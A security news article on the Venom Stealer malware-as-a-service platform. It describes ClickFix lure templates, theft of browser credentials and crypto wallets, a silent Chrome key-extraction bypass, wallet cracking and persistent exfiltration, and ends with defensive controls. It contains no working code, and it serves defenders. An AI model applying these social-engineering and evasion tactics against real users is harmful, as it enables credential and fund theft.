Managing exposure to ClickFix-style social engineering campaigns requires understanding how these threats are evolving. Recently, security researchers at BlackFog identified a newly distributed malware-as-a-service (MaaS) platform that automates the technical steps of these campaigns for threat actors.
Operating under the name "VenomStealer," the developer offers a MaaS platform on cybercriminal networks that allows operators to create a persistent, multistage execution flow. Based on the initial ClickFix user interaction, the software automates unauthorized access to credentials, cryptocurrency wallets, and ongoing data exfiltration.
According to BlackFog founder and CEO Darren Williams, Venom differentiates itself from commodity stealers like Lumma, Vidar, and RedLine by extending beyond a single credential harvesting event. The platform integrates ClickFix social engineering directly into its operator panel, automating the post-access sequence and establishing a continuous exfiltration pipeline that remains active after the initial execution package finishes running.
Marketed on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform operates on a subscription model, costing $250 a month or $1,800 for lifetime access. The operation includes a vetted application process, Telegram-based licensing, and a 15% affiliate program. The delivery mechanism relies on a native C++ binary compiled per-operator directly from the web panel.
Unlike traditional infostealers that execute once, transmit data, and exit, Venom Stealer continuously scans the affected system. It harvests credentials, session cookies, and browser data while targeting cryptocurrency wallets and stored secrets. The platform also automates wallet cracking and fund draining. The operation appears highly active, with the developer shipping multiple platform updates throughout March alone.
Step-by-step ClickFix execution
A campaign built with Venom Stealer begins when an individual lands on a deceptive ClickFix page hosted by the operator. The platform includes four templates for both Windows and macOS environments: a fake Cloudflare CAPTCHA, a fake OS update, a simulated SSL certificate error, and a fake font installation page. Each template instructs the user to open a Run dialog or Terminal window, copy and paste a specific command, and press Enter.
Because the user initiates the execution manually, the process appears as normal user activity, which frequently bypasses detection logic that relies on evaluating parent-child process relationships.
Available Windows execution packages in the kit include.exe,.ps1 (enabling fileless execution via PowerShell),.hta, and.bat options. For macOS environments, the templates utilize bash and curl. The platform allows operators to configure custom domains through Cloudflare DNS, ensuring the panel URL remains hidden from the command string copied by the user.
Once executed, the software scans every Chromium and Firefox-based browser on the machine. It extracts saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults across all browser profiles.
The execution sequence also includes specific evasion capabilities. For instance, the password encryption in versions 10 and 20 of Chrome is bypassed using a silent privilege escalation technique. This extracts the decryption key without triggering a user account control (UAC) dialog, minimizing forensic artifacts. Additionally, the software captures system fingerprinting and browser extension inventories, compiling a comprehensive profile of the affected user.
This collected data leaves the infected device immediately, with little to no local staging or delay. Without adequate visibility into outbound network traffic, detecting this extraction phase is significantly more difficult for security teams.
Persistent data exfiltration pipeline
Upon discovering wallet data, the software transfers it to a server-side, GPU-powered cracking engine. This engine automatically cracks cryptocurrency wallets, including MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. A March 9 update to the platform introduced a File Password and Seed Finder, which searches the local filesystem for saved seed phrases and feeds any discovered data into the cracking pipeline.
Consequently, users who avoid saving credentials directly in their browsers still face exposure if seed phrases are stored anywhere on their local machine.
While some newer infostealer variants include persistence mechanisms, Venom Stealer maintains an active presence after the initial compromise. It continuously monitors Chrome’s Login Data file, capturing newly saved credentials in real-time. This mechanism undermines standard credential rotation as an incident response measure and extends the data exfiltration window, making it more challenging for security teams to determine the full scope of a security incident.
Reducing exposure to ClickFix campaigns
Security researchers from Proofpoint first identified ClickFix techniques roughly two years ago, and the methodology has since gained significant traction. The technique relies on instilling a sense of urgency—prompting users to fix an error or install an update—while using familiar, benign interfaces like CAPTCHA prompts to create a false sense of security. The primary goal is to trick the user into manually executing unauthorized commands.
Organizations can safeguard their environments and reduce exposure to threats like Venom Stealer by implementing several preventative controls:
Restrict PowerShell execution: Limit access to PowerShell for standard users and enforce strict execution policies.
Disable the Run dialog: Use Group Policy to remove the Run dialog for non-administrative users.
Enhance security awareness: Train employees to recognize ClickFix-style social engineering, specifically the danger of copying and pasting commands from web prompts into terminals.
Monitor outbound traffic: Because the sequence relies on data leaving the device, monitoring and controlling outbound traffic provides a critical opportunity to detect exfiltration activity and mitigate the impact of credential theft.